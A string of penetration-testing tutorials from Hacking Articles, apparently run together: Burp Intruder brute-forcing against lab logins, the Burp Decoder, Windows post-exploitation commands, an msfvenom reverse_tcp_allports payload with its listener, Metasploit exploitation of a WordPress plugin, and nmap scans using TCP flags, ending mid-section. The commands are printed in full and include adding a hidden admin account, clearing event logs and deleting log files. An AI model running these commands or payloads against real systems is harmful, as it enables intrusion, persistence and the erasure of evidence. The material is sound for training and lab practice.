Hello friends!! Today we are discussing about the “Types of Payload in Burp Suite”. Burp Suite is an application which is used for testing Web application security. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities. This tool is written in JAVA and is developed by PortSwigger Security. We are going to use the Intruder feature of Burp Suite, it is used to brute force web applications. There are 18 types of payloads in intruder i.e.  

• Simple list
• Runtime File
• Case Modification
• Numbers
• Brute Forcer
• Character substitution
• Custom iterator
• Recursive grep
• Illegal Unicode
• Character blocks
• Dates
• Brute Forcer
• Null Payloads
• Character frober
• Bit Flipper
• Username generator
• ECB block shuffler
• Extension Generated
• Copy other payload

Simple List

This is one of the simple types of payload, as it allows you to configure a short Dictionary of strings which are used as payload.

First, we intercept the request of the login page in the DVWA LAB, where we have given a random username and password. Then click on login, the burp suite will capture the request of the login page.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select positions and you can observe the highlighted username and password and follow the given below step for selecting payload position.

• Press on the Clear button given at right of window frame.
• Now we will select the fields where we want to attack which is the username and password and click on Add button.
• Choose the Attack type as Cluster Bomb.
• In the given below image we have selected username and password that means we will need two dictionary files i.e. one for username and second for password.

So now, go to Payloads tab and the select 1 from Payload set (this ‘1’ denotes the first file to be selected). Then click on Load button and select your dictionary file for username.

Now select 2 in the Payload set and again give the dictionary file for the password. Select Start Attack in the Intruder menu as shown in the image.

Now the burp suite will do its work, match the valid combination of username and password and will give you the correct password and username. The moment it will find the correct value, it will change the value of length as shown.

And to confirm the username and password matched, we will give the matched username and password in the DVWA LAB login page. We will see a message “Welcome to the password protected area admin” which shows are success in the simple list payload attack.

Runtime File

This type of payload allows you to configure a file which reads the payload strings at runtime. This type of payload is needed when we require large list of payloads, to avoid holding the entire list in memory. This payload allows you to configure large list of strings which overcomes the simple list payload type.

First, we have intercepted the request of the login page in the DVWA LAB, where we have given a random username and a random password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

Send the captured request to the Intruder and follow given below step. Now open the Intruder tab then select positions and you can observe the highlighted password and follow the given below step for selecting payload position.

• Press on the Clear button given at right of window frame.
• Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.
• Choose the Attack type as
• In the given below image we have selected username and password that means we will need two dictionary files i.e. one for username and second for password.

Then select the “Payload type” as Runtime File and then give the path of dictionary in the “payload options” as /usr/share/wordists/rockyou.txt which is the largest dictionary in Kali Linux. Select Start Attack in the Intruder menu.

Now the burp suite will do its work, match the password and will give you the correct password. The moment it will find the correct value, it will change the value of length as shown.

Case Modification

This type of payload allows you to configure a list of strings and apply various case modifications to each item on the list. This is useful in password guessing attacks, for generating case variations on dictionary words.

The following case modification rules can be selected:

• No change – The item is used without being modified.
• To lower case – All letters in the item are converted to lower case.
• To upper case – All letters in the item are converted to upper case.
• To Proper name – The first letter in the item is converted to upper case, and the remaining letters are converted to lower case.
• To Proper Name – The first letter in the item is converted to upper case, and the remaining letters are not changed.

For example, if we select all the modification options, then the item “Raj Chandel” will generate the following payloads:

Raj Chandel

raj chandel

RAJ CHANDEL

Raj chandel

First, we intercept the request of the login page in the DVWA LAB, where we have given a random username and a random password. Then click on login , the burp suite will capture the request of the login page in the intercept tab. Send the captured request to the Intruder by right clicking on the space and selecting Send to Intruder option or simply press ctrl + i.

Now open the Intruder tab then select positions and you can observe the highlighted password and follow the given below step for selecting payload position.

• Press on the Clear button given at right of window frame.
• Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.
• Choose the Attack type as
• In the given below image we have selected username and password that means we will need two dictionary files i.e. one for username and second for password.

Then select the “Payload” type as Case Modification, we have selected the No change and to lower case fields in the “payload options” of the case modification as shown in the image. We have added a default Password dictionary from the Add from list field in the payload options. Select Start Attack in the Intruder menu as shown in the image.

Now the burp suite will do its work, match the password and will give you the correct password. The moment it will find the correct value, it will change the value of length as shown.

Numbers

This type of payload generates numeric payloads within a given range and in a specified format.

The following options are available in this payload:

• Number range:

• Type – the type options describes that the numbers should be generated sequentially or randomly.
• From – If numbers are being generated sequentially, this is the value of the first number that will be generated.
• To – If numbers are being generated sequentially, this value of the last number that will be generated. It is said as the highest possible number that may be randomly generated.
• Step – the step option is used when numbers are being generated sequentially and specifies the increment in the successive numbers.
• How many – This option is available when numbers are being generated randomly, and specifies the number of payloads that will be generated

First, we intercept the request of the login page in the Bwapp Lab, where we have given a random username and a random password. Then click on login, the burp suite will capture the request of the login page.

Send the captured request to the Intruder and follow given below step. Now open the Intruder tab then select positions and you can observe the highlighted password and follow the given below step for selecting payload position.

• Press on the Clear button given at right of window frame.
• Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.
• Choose the Attack type as
• In the given below image we have selected username and password that means we will need two dictionary files i.e. one for username and second for password.

Then select the Payload type as Numbers where we have set the number range from 100 to 150 and we have set the step as 1 as shown in the image, select Start Attack in the Intruder menu.

Now the burp suite will do its work, match the password and will give you the correct password. The moment it will find the correct value, it will change the value of length as shown.

As the password matches with a number which is between the given number range. And to confirm the password matched, we will give the password in the Bwapp LAB login page, which will successfully log us into the Bwapp lab. This shows our success in the attack.

Brute Forcer

This type of payload generates a payload of specified lengths that contain all permutations of list of characters in the given string.

The following options are available:

• Character set – The set of characters to be used in the payloads. Note that the total number of payloads increases exponentially with the size of this set.
• Min length – The length of the shortest payload.

• Max length – The length of the longest payload.

First, we intercept the request of the login page in the Bwapp LAB, where we have given a random username and a random password. Then click on login, the burp suite will capture the request of the login page.

Send the captured request to the Intruder and follow given below step. Now open the Intruder tab then select positions and you can observe the highlighted password and follow the given below step for selecting payload position.

• Press on the Clear button given at right of window frame.
• Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.
• Choose the Attack type as
• In the given below image we have selected username and password that means we will need two dictionary files i.e. one for username and second for password.

Then select the “Payload type” as Brute Forcer where we can give any kind of input into the “character set” as shown in the figure , as we have given 213 and we have set the Min length as 3 and Max length as 3 as shown in the image. We can manually give the Min length and Max length as per your need. Select Start Attack in the Intruder menu as shown in the image.

Now the burp suite will do its work, match the password and will give you the correct password. The moment it will find the correct value, it will change the value of length as shown.

Great!! We have used Top 5 payloads of Burpsuite for login page brute force attack successfully.

Note: In this articles (part-1) we will be performing top 5 payload types and the rest of the payload types will be discussed in the (part-2) of this article.

Author: Ashray Gupta is a Researcher and Technical Writer at Hacking Articles. He is a certified ethical hacker, web penetration tester and a researcher in nanotechnology.

The post Beginners Guide to Burpsuite Payloads (Part 1) appeared first on Hacking Articles.

Burpsuite Decoder can be said as a tool which is used for transforming encoded data into its real form, or for transforming raw data into various encoded and hashed forms. This tool is capable of recognizing several encoding formats using defined techniques. Encoding is the process of putting a sequence of character’s (letters, numbers, punctuation, and symbols) into a specialized format which is used for efficient transmission or storage. Decoding is the opposite process of encoding the conversion of an encoded format back into the original format. Encoding and decoding can be used in data communications, networking, and storage.

Today we are discussing about the Decoder Option of ‘Burp Suite’. Burp Suite is a tool which is used for testing Web application security. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities. This tool is written in JAVA and is developed by PortSwigger Security.

There are 9 types of decoder format in Burp Suite:

• Plain text
• URL
• HTML
• Base64
• ASCII Hex
• Hex
• Octal
• Binary
• Gzip

URL Encoder & Decoder

When you will explore decoder option in burp suite you will observe two section left and right. The left section is further divided in two and three section for encode and decode option respectively. The right section contains function tab for encode and decode option. And if you will observe given below image you can notice there is two radio buttons for selecting type of content you want to encode or decode.

Enable the radio button for text option and then we can give any input in the box to be encoded, here we have given Raj chandel as an input as shown in the image. After that click on the Encoded as option and select URL field from given list as shown in the image. We will get the encoded result in URL format in the second box as shown in the image.

 We can directly decode the Encoded URL Text by clicking on the Decoded as option and selecting URL field from given list of options as shown in the image.  This will decode the encoded URL text into plain text in the third box as shown in the image.

HTML Encoder & Decoder

Repeat the same and give any input in the first box to be encoded, here we have given Raj chandel as an input as shown in the image. After that click on the Encoded as option and select HTML field as shown in the image. We will get the encoded result in HTML format in the second box as shown in the image.

We can directly decode the Encoded HTML Text by clicking on the Decoded as option and selecting HTML field as shown in the image.  This will decode the encoded HTML text into plain text in the third box as shown in the image.

Base64 Encoder & Decoder

Repeat the same process and give any input in the first box to be encoded, here we have given Raj chandel as an input as shown in the image. After that click on the Encoded as option and select Base64 field as shown in the image. We will get the encoded result in Base64 format in the second box as shown in the image.

We can directly decode the Encoded Base64 Text by clicking on the Decoded as option and selecting Base64 field as shown in the image.  This will decode the encoded Base64 text into plain text in the third box as shown in the image.

ASCII Hex Encoder & Decoder

Again repeat the same process and give any input in the first box to be encoded, here we have given Raj chandel as an input as shown in the image. After that click on the Encoded as option and select ASCII Hex field as shown in the image. We will get the encoded result in ASCII Hex format in the second box as shown in the image.

We can directly decode the Encoded ASCII Hex Text by clicking on the Decoded as option and selecting ASCII Hex field as shown in the image.  This will decode the encoded ASCII Hex text into plain text in the third box as shown in the image.

Hex Encoder & Decoder

Repeat same as above and give any input in the first box to be encoded, here we have given Raj chandel 123456789 as an input as shown in the image. After that click on the Encoded as option and select Hex option as shown in the image. We will get the encoded result in Hex format in the second box as shown in the image.

We can directly decode the Encoded Hex Text by clicking on the Decoded as option and selecting Hex field as shown in the image.  This will decode the encoded Hex text into plain text in the third box as shown in the image.

Octal Encoder & Decoder

Repeat again and give any input in the first box to be encoded, here we have given Raj chandel 123456789 as an input as shown in the image. After that click on the Encoded as option and select Octal field as shown in the image. We will get the encoded result in Octal format in the second box as shown in the image.

We can directly decode the Encoded Octal Text by clicking on the Decoded as option and selecting Octal field as shown in the image.  This will decode the encoded Octal text into plain text in the third box as shown in the image.

Binary Encoder & Decoder

Repeat the same and give any input in the first box to be encoded, here we have given Raj chandel 123456789 as an input as shown in the image. After that click on the Encoded as option and select Binary field as shown in the image. We will get the encoded result in Binary format in the second box as shown in the image.

We can directly decode the Encoded Binary Text by clicking on the Decoded as option and selecting Binary field as shown in the image.  This will decode the encoded Binary text into plain text in the third box as shown in the image.

Gzip Encoder & Decoder

Give any input in the first box to be encoded, here we have given Raj chandel as an input as shown in the image. After that click on the Encoded as option and select Gzip field as shown in the image. We will get the encoded result in Gzip format in the second box as shown in the image.

We can directly decode the Encoded Gzip Text by clicking on the Decoded as option and selecting Gzip field as shown in the image.  This will decode the encoded Gzip text into plain text in the third box as shown in the image.

Author: Ashray Gupta is a Researcher and Technical Writer at Hacking Articles. He is a certified ethical hacker, web penetration tester and a researcher in nanotechnology. Contact Here

The post Burpsuite Encoder & Decoder Tutorial appeared first on Hacking Articles.

This article is about Post Exploitation on the Victim’s System using the Windows Command Line. When an Attacker gains a meterpreter session on a Remote PC, then he/she can enumerate a huge amount of information and make effective changes using the knowledge of the Windows Command Line.

Requirement

Attacker: Kali Linux

TarObtain: Window PC

To execute this, we will first Obtain the meterpreter session of the Remote PC which you can learn from here. After gaining the session, escalate its privileged to Administrator which you can learn from here.

Now to access windows command line, type ‘shell’ in the meterpreter shell.

Let’s Start!!

Obtain User Details and its Privileges

After gaining the meterpreter shell or windows command line, before doing any work. It is important to know the current user. This command is usually used to verify that the account that we were trying to access is the one we got. This can be simply done using the command whoami.

To increase our reach, we will an option in “whoami” command:

[/all]: To show all the details about the user.

Example: whoami /all

As seen below we have username, SID and local group details

We also Obtain details about the privileges that are enabled or disabled to the user we are currently logged on.

Obtain the System Info

This command helps us enumerate lots of information regarding the system like hostname, domain, time zone and much more.

Example: systeminfo

We can sort the basic system details such as (Manufacturer, Build, and Model) of the victim’s System using findstr.

Example: systeminfo | findstr System

As shown in the below screenshot we have the Boot Time, Manufacturer, Model, Type, Directory and Language of the Victim’s System.

We can obtain the location (as close as the country) of victim’s System using systeminfo.

Here we are using findstr with systeminfo to filter the systeminfo results.

Example: systeminfo | findstr Time

As shown in the below screenshot we have the Time Zone (UTC+05:30), so we can say that the victim’s System is in “INDIA”.

Obtain Memory Details (Physical, Virtual, In Use, Free)

We can Obtain the basic memory details of the victim’s System using systeminfo.

Here we are using findstr with systeminfo to filter the systeminfo results.

Example: systeminfo | findstr Memory

As shown in the below screenshot we have the Total Physical Memory 3.5 GB out of which 1.6 GB is available, we are also Obtainting Virtual Memory Details.

Obtain the List System Drivers

We can display a list of all installed device drivers on the victim’s system and their properties through the command called driverquery.

Example: driverquery

Obtain the List of Kernel Drivers

We can the list of Kernel Drivers on the victim’s System using driverquery.

Here we are using findstr with driverquery to filter the driverquery results.

Example: driverquery | findstr Kernel

As seen below we have obtained a list of kernel drivers which can be used to get the direct exploits to the Victim’s System.

Obtain the List of File System Drivers

We can the list of File System Drivers on the victim’s System using driverquery.

Here we are using findstr with driverquery to filter the driverquery results.

Example: driverquery | findstr “File System”

Display Info about a Particular Service

We can obtain information about a particular service using sc command. Here we are using following options with sc command:

[query] to Obtain the names of a service.

Syntax: sc query [service name]

Example: sc query wuauserv

Obtain the list of Active Tasks

We can obtain information about running tasks using tasklist command.

This command shows the name of the task running along with the Process ID (PID), Session Name, Session Number and Memory Usage.

Syntax: tasklist

We can sort the output of tasklist according to the modules using the following options of tasklist command:

[/m]: To specify the Modules in Tasklist

But we will have to mention the module which is to be used to sort the Tasklist.

Syntax: tasklist /m [Module Name]

Example:  tasklist /m ntdll.dll

Here we can see all the tasks linked with ntdll.dll module.

Killing Tasks

We can kill tasks on the Victim’s System using a command called taskkill.

Taskkill requires either one of two things:

1. Process Id
2. Task Name

Here we are going to use [/f] option in taskkill, it enables the Taskkill to forcefully kill the tasks.

Killing the Tasks using the Process ID

Syntax: taskkill /f /pid [Process id of Task]

Example: taskkill f /pid 7236

Killing the Tasks using the Task Name

Syntax: taskkill /f /im “[Task Name]”

Example: taskkill /f /im “Taskmgr.exe”

Start or Stopping Services

We can start a service or some backdoor without the knowledge of the Victim using sc command.

Here we are using following options with sc command:

[start] to start a service.

Syntax:sc start [Service Name]

Example: sc start TeamViewer

As you can see in the below image the service has started.

We can also stop a service using sc command.Here we are using following options with sc command:

[stop] to start a service.

Syntax:sc stop [Service Name]

Example: sc stop TeamViewer

As you can see in the below image the process Stopped

List all the logs on the System

We can obtain a list of all the logs on a system using wevtutil command. Here we are using following options with wevtutil command:

[el] to List log names.

Example: wevtutil el

Clear a specific logon the System

We can clear a specific log on a system using wevtutil command. Here we are using following options with wevtutil command:

[cl] to List log names.

Syntax: wevtutil cl [log name]

Example: wevtutil cl System

Find all the Hard Disk/Storage Partitions on a System

While penetration testing a Remote PC, knowledge of all the Hard Disk or Storage Devices and Partitions is essential so that we can sweep all the partitions and Storage Devices in hope to find data of any particular importance.

This can be done using fsutil command. Here we are using following options with fsutil command:

[fsinfo] to view file system info.

[drives] to list all drives.

Example: fsutil fsinfo drives

As you can see below that the Victim System has 4 Hard Disk Partitions C, D, E and F

Delete all logs on a System

While penetration testing a remote pc, it is essential to remove the trace of youractivities, so we need to remove the evidence of our presence which can be found in log files.

The entire Log file has a .log extension so we are going to sweep the System Directory for files with extension .log and delete them with del command.

Note: Use this command with the path set to System Directory (In my case it is C:\)

Here we are using following options with del command:

[/a] to select files based on attributes.

[/s] to select System Files (/s is an attribute so it is to be used after /a)

[/q] to use Quiet Mode (It doesn’t ask if Ok to delete on global wildcards)

[/f] to force delete the read only files

Syntax:del [Directory]\*.log /a /s /q /f

Example: del \*.log /a /s /q /f

As you can see in the below screenshot the process of detecting and deleting the files with .log extension has started.

Manage Local Users

While penetration testing a remote PC, it is important to obtain the list of Local Users so that attacker can gain infomation about the various users assigned to that particular system.

This can be done using net command. Here we are using following options to be used with net command:

[-user] to display the list of local users

Example: net user

It is always advantageous to add a user in the Local Groups so that attacker can perform certain tasks on that system.

This can be done using net command. Here we are using following options with net command:

Syntax:net user [logon_name] [password] /add

Example: net user hacker pass123 /add

Many times, we come across a situation where we will have to perform certain administrative tasks, so we will add the user we created to the Administrative local group

Here we are using following options to be used with net command:

[-localgroup] to select the list of local groups

Syntax: net localgroup administrators [logon_name] /add

Example: net localgroup administrators hacker/add

In the above example, I have added a user in the local administrators group named as hacker. We can verify using the “net user” command

Now, during the clean-up process it is important to delete the local user created.

This can be done using net commandHere we are using following options with net command:

Syntax: net user [logon_name] /del

Example: net user hacker /del

Here you can see that I have used net command to add a user, making it a member of administrator local group and then deleting that user.

Display the List of all Scheduled Tasks

While penetration testing a remote PC, it is necessary to know the scheduled tasks to plan the attacks accordingly to further penetrate the Victim’s System. This can be done using schtasks.

We can sort schtasks so as to obtain a better readable format i.e. in a List Format.

Here we are using following options with schtasks command:

[/query]to display all scheduled tasks

[/fo] to specify the format of the Output (In this case we use List)

[/v] to use verbose mode

Example: schtasks /query /fo LIST /v

Author: Pavandeep Singh is an Ethical Hacker, Web Penetration Tester, Windows Command Line Expert and Researcher at hackingarticles.in. Contact here

The post Manual Post Exploitation on Windows PC (System Command) appeared first on Hacking Articles.

Introduction

Network Address Translation generally involves “re-writing the source and/or destination addresses of IP packets as they pass through a router or firewall” (from http://en.wikipedia.org/wiki/Network_Address_Translation)

The Linux kernel usually possesses a packet filter framework called netfilter (Project home: netfilter.org). This framework enables a Linux machine with an appropriate number of network cards (interfaces) to become a router capable of NAT. We will use the command utility ‘iptables’ to create complex rules for modification and filtering of packets. The important rules regarding NAT are – not very surprising – found in the ‘nat’-table. This table has three predefined chains: PREROUTING, OUTPUT und POSTROUTING.

ALL-PORTS payload:-

‘reverse_tcp’ only allows connection to one port, but if the victim has blocked outgoing connections except a few ports. Then it makes it difficult for the attacker to set a port for listening. ‘reverse_tcp _allports’ is used to to brute-force all the ports from {1-65535}.

We use iptables to reroute any incoming connection to the listening port.

Let’s begin

We use metasploit to create a meterpreter reverse shell.

msfvenom -p windows/meterpreter/reverse_tcp_allports lhost=192.168.1.139 lport=4444 -f exe > reverse_shell.exe

We now setup our listener using metasploit.

msf > use exploit/multi/handler

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp_allports

msf exploit(multi/handler) > set lhost 192.168.1.139

msf exploit(multi/handler) > set lport 4444

msf exploit(multi/handler) > run

Now we setup the firewall on our windows machine. We open firewall and select outbound connections.

We select ports to define the ports we need to block.

We select tcp to block tcp packets, and select port from 4444-5555.

Now we select ‘Block the connection’ to block all the outgoing traffic packets from these ports.

Now we select the types of connection the firewall applies to.

We now name the firewall rule as “REVERSE_SHELL” and click finish to apply the rule.

Now we define iptables to reroute all traffic coming to port 4444-5556 to port 4444. So that when the reverse shell tries to connect to our system on port 5556 it will be rerouted to port 4444.

iptables -A PREROUTING -t nat -p tcp –dport  4444:5556 -j REDIRECT –to-port 4444

As soon as the victim runs the file we get our reverse shell.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

The post Bypass Firewall Restrictions with Metasploit (reverse_tcp_allports) appeared first on Hacking Articles.

Hello Friends!!  In our previous article part1 we had discussed how to perform brute force attack on any web application server for making unauthorized login into it using some Payload of Burpsuite. In part 2 articles you will learn more about brute force attack with help of remaining BurpSuite payloads that might be helpful in other situation.

Let’s Start!!

Character Substitution

This type of payload allows to configure a list of strings and apply various character substitutions to each item. This type of payload is useful in password guessing attacks and generating common variations on dictionary words.

The UI of this payload allows you to configure a number of character substitutions. For each item, it will generate a number of payloads, which include all permutations of substituted characters according to the defined substitutions.

 For example, the default substitution rules states (which include e > 4 and r > 5), the item “Raj Chandel” will generate the following payloads:

raj chandel

5aj chandel

raj chand4l

5aj chand4l

First, we have intercepted the request of the login page in the DVWA LAB, where we have given a default username and wrong password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted password and follow the given below step for selecting payload position.

• Press on the Clear button given at right of window frame.
• Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.
• Choose the Attack type as

• In the given below image we have selected password that means we will need one dictionary files for password.

 Now click on payloads option after selecting payload position. Here we can add a dictionary by clicking on Load option or we can manually add Strings by clicking on the Add option.

Now we have substituted 4>a , 5>s , 9>o as per our requirements to match the password and we have added the input as p445w9rd using the Add option which will substitute the character’s according to the Defined substitution as shown in the image.

Start Attack in the Intruder menu as shown in the image.

Sit back and relax because now the burp suite will do its work, match the password and will give you the correct password. The moment it will find the correct value, it will change the value of length as shown.

 And to confirm the password matched, we will give the matched password in the DVWA LAB login page. We will see a message “Welcome to the password protected area admin” which shows are success in the character substitution payload attack.

Copy Other Payload

This is a type of payload which can copy the value of the current payload to another payload position. It is very useful for attack types that have multiple payload sets such as cluster bomb, pitch fork and battering ram. This payload type can be useful in various situations, for example:

• Suppose we are using two different parameters and we want to attack at two different fields, therefore we can set different “payload types” at multiple “payload sets” inside burpsuite payload configuration as per our attack type as it allows us to simply use the same dictionary for both payload that we have set at particular position by giving the position of the payload we want to copy. It will execute the complete payload which is set at a specific position.

First, we have intercepted the request of the login page in the Bwapp LAB, where we have given wrong username and password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted username and password and follow the given below step for selecting payload position.

• Press on the Clear button given at right of window frame.
• Now we will select the fields where we want to attack which is the username and password and click on Add button.
• Choose the Attack type as Cluster Bomb.
• In the given below image we have selected username and password that means we will need two dictionary files i.e. one for username and second for password.

Now click on payloads option after selecting payload position, here we need to add a dictionary which will use for both payload set. Then select the Payload type as Simple list for Payload Set ‘1’ which will attack at the username field.

Now  to attack at the password field we will select Payload type as Copy other payload for Payload Set ‘2’ because we want to attack the same payload type at payload set 2 which will copy the dictionary given for payload set 1 to attack.

Select Start Attack in the Intruder menu as shown in the image.

Sit back and relax because now the burp suite will do its work, match the username and password which will give you the correct username and password. The moment it will find the correct value, it will change the value of length as shown in the image.

And to confirm the password matched, you can give the matched password in the BWAPP LAB login page.

Username Generator

This type of payload allows you to set up a list of names or email addresses, and can produce usernames from given specific schemes.

For example, Let’s take a username “raj chandel” which can give results in up to 115 possible usernames, some combination are as follows :

rajchandel

raj.chandel

chandelraj

chandel.raj

chandel

raj

rajc

etc…

This type of payload is useful to target at a specific user, where you do not know the username or email address scheme of the user which is being used in a specific application.

First, we have intercepted the request of the login page in the Bwapp LAB, where we have given wrong username and password. Then click on login , the burp suite will capture the request of the login page in the intercept tab.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted username and password and follow the given below step for selecting payload position.

• Press on the Clear button given at right of window frame.
• Now we will select the fields where we want to attack which is the username and password and click on Add button.
• Choose the Attack type as Cluster Bomb.
• In the given below image we have selected username and password that means we will need two dictionary files i.e. one for username and second for password.

Then select the Payload type as “Username Generator” for Payload Set ‘1’ which will attack at the username field, we have a given input string “raj chandel” by using the Add option as shown in the image, which will use different permutations on that input string given to match the correct username.

Now to attack at the password field we will select Payload type as Simple list for Payload Set ‘2’ for which we have added a dictionary manually created by us by using the Load option.

Select Start Attack in the Intruder menu as shown in the image.

Sit back and relax because now the burp suite will do its work, match the username and password which will give you the correct username and password. The moment it will find the correct value, it will change the value of length as shown in the image.

Dates

This type of payload generates date payloads within a given range and in a specified format. This type of payload is can be used in data mining or brute forcing.

For example it can be used to guess a user’s birth date, wedding date, anniversary date etc which can be used to brute force the security questions for an application or web applications, or it can used to brute force the password of user’s, where user’s uses dates as their password.

The following options are available in this type of payload:

• From – This is said as the first date which will be generated.
• To – This is said as the last date which will be generated.
• Step – This is said as an increase between sequential dates, days, weeks, months or years. It should be a positive value.
• Format – This is said as the format in which dates can be represented. we can select from different predefined date formats, or we can make our own custom date format as per our requirement. Some example of the date format are given below:

Repeat the same to intercept the request of the login page in the Bwapp LAB, where we have given wrong username and password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted username and password and follow the given below step for selecting payload position.

• Press on the Clear button given at right of window frame.
• Now we will select the fields where we want to attack which is the username and password and click on Add button.
• Choose the Attack type as Cluster Bomb.
• In the given below image we have selected username and password that means we will need two dictionary files i.e. one for username and second for password.

Then select the Payload type as Simple list for Payload Set ‘1’ which will attack at the username field where we have given a dictionary as an input string as shown in given below image.

Now to attack at the password field we will select Payload type as Dates for Payload Set ‘2’ because we are guessing the user might have its birth date or any other date as a password.

After this we have set the inputs for Payload set ‘2’ in the fields given in the payload options such as FROM, TO, STEP and FORMAT as shown in the image.

Now Select Start Attack in the Intruder menu for brute force attack.

Sit back and relax because now the burp suite will do its work, match the username and password which will give you the correct username and password. The moment it will find the correct value, it will change the value of length as shown in the image.

Author: Ashray Gupta is a Researcher and Technical Writer at Hacking Articles. He is a certified ethical hacker, web penetration tester and a researcher in nanotechnology.

The post Beginners Guide to Burpsuite Payloads (Part 2) appeared first on Hacking Articles.

Burp_wp is an extension of burpsuite used to scan and find vulnerabilities in wordpress plugins and themes using burpsuite proxy. It was created by Kacper Szurek and can be downloaded from here.

Let’s begin

To run this extension we first need to install jython. Jython is an implementation of python programming that can run on java platform. You can download jython from here.

Now we download jython to burpsuite. We go to the python Environment and locate the jar file.

Now we go to extender, and select extensions tab to add the burp_wp extension.

We click on Add, a pop up will come. We select python as extension type and give the location at which the burp_wp file is located. We select “show in UI” for standard output and error to get any error if any occur.

As soon as the extension get installed we get the message in the image below that shows it was installed successfully.

Now we get a new “Burp WP” tab. Burp_WP automatically updates the first time it gets installed. It downloads the list of vulnerable plugins and theme from the database of WPscan.

Now we intercept the request of the website we want to scan for vulnerabilities.

As soon as we forward the request we go to Burp WP tab and we can find all the vulnerable plugins and themes on the website. We will get all vulnerable plugins and themes as we go through the site.

Now we use metasploit to exploit this vulnerability.

msf > use exploit/unix/webapp/wp_nmediawebsite_file_upload

msf exploit(unix/webapp/wp_nmediawebsite_file_upload) > set rhost 192.168.1.143

msf exploit(unix/webapp/wp_nmediawebsite_file_upload) > run

As soon as we run this exploit we get the reverse shell.

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

The post WordPress Exploitation using Burpsuite (Burp_wp Plugin) appeared first on Hacking Articles.

In this article we are going to scan the target machine by sending TCP flags through their hexadecimal value and the actual Flag name can be confirm by analysis of Nmap traffic through Wireshark.

Let’s have a look over Hex value of TCP Flag in given below table which we are going to use in Nmap for port enumeration.

NULL Scan

In this scan we are sending the NONE flag of the tcp by using its hexadecimal value on the target machine to enumerate the state of ports is open, closed or filtered.

Now execute given below command for enumerating state of any port, here we want to identify state for port 21.

nmap -p21 –scanflags 0x00 192.168.1.103

From given below image you can observe we have found port 21 filtered.

When network admin will captured the incoming traffic he will get packet for TCP-NONE flag, here we have used wireshark for network packet analysis and we found that it is showing TCP-NONE packet for hex value 0x00 coming from 192.168.1.104 on port 21 as shown in given below image. 

FIN Scan

TCP-FIN flag always used for finished the communication with target network. In this scan we are sending the FIN flag of the tcp by using its hexadecimal value on the target machine to enumerate the state of ports is open, closed or filtered.

Now execute given below command for enumerating state of any port, here we want to identify state for port 21.

nmap -p21 –scanflags 0x01 192.168.1.103

From given below image you can observe we have found port 21 filtered.

When network admin will captured the incoming traffic he will get packet for TCP-FIN flag, here we have used wireshark for network packet analysis and we found that it is showing TCP-FIN packet for hex value 0x01 coming from 192.168.1.104 on port 21 as shown in given below image. 

SYN Scan

TCP-SYN flag always initiate communication to establish the connection with target network. In this scan we are sending the SYN flag of the tcp by using its hexadecimal value on the target machine to enumerate the state of ports is open, closed or filtered.

Now execute given below command for enumerating state of any port, here we want to identify state for port 21.

nmap -p21 –scanflags 0x02 192.168.1.103

From given below image you can observe we have successfully found port 21 open.

When network admin will captured the incoming traffic he will get packet for TCP-SYN flag, here we have used wireshark for network packet analysis and we found that it is showing TCP-SYN packet for hex value 0x02 coming from 192.168.1.104 on port 21 as shown in given below image. 

Reset Scan

RST flag is used to reset the connection between the sender machine and the target machine. In this scan we are sending the RST flag of the tcp by using its hexadecimal value on the target machine to enumerate the state of ports is open, closed or filtered.

Now execute given below command for enumerating state of any port, here we want to identify state for port 21.

nmap -p21 –scanflags 0x04 192.168.1.103

From given below image you can observe we have found port 21 filtered.

When network admin will captured the incoming traffic he will get packet for TCP-RST flag, here we have used wireshark for network packet analysis and we found that it is showing TCP-RST packet for hex value 0x04 coming from 192.168.1.104 on port 21 as shown in given below image. 

PUSH Scan

In this scan we are sending the PSH flag of the tcp by using its hexadecimal value on the target machine to enumerate the state of ports is open, closed or filtered.

Now execute given below command for enumerating state of any port, here we want to identify state for port 21.

nmap -p21 –scanflags 0x08 192.168.1.103

From given below image you can observe we have found port 21 filtered.

When network admin will captured the incoming traffic he will get packet for TCP-PSH flag, here we have used wireshark for network packet analysis and we found that it is showing TCP-PSH packet for hex value 0x08 coming from 192.168.1.104 on port 21 as shown in given below image. 

PUSH flag is used to push the process priority higher of the packet to the target machine.

ACK Scan

Ack flag is used to acknowledge the sender machine whether the packet is received or dropped by the target. So that the sender again send the lost or dropped packet on the target network to complete the communication process. Here we are sending the ACK flag of the tcp by using its hexadecimal value on the target machine to enumerate the state of ports is open, closed or filtered.

Now execute given below command for enumerating state of any port, here we want to identify state for port 21.

nmap -p21 –scanflags 0x10 192.168.1.103

From given below image you can observe we have found port 21 closed.

When network admin will captured the incoming traffic he will get packet for TCP-ACK flag, here we have used wireshark for network packet analysis and we found that it is showing TCP-ACK packet for hex value 0x10 coming from 192.168.1.104 on port 21 as shown in given below image. 

Open and closed ports will both return a RST packet. Nmap then labels them as unfiltered, meaning that they are reachable by the ACK packet, but whether they are open or closed is undetermined. Ports that don’t respond, or send certain ICMP error messages back (type 3, code 0, 1, 2, 3, 9, 10, or 13), are labeled filtered. (Form Nmap.org)

Urgent Scan

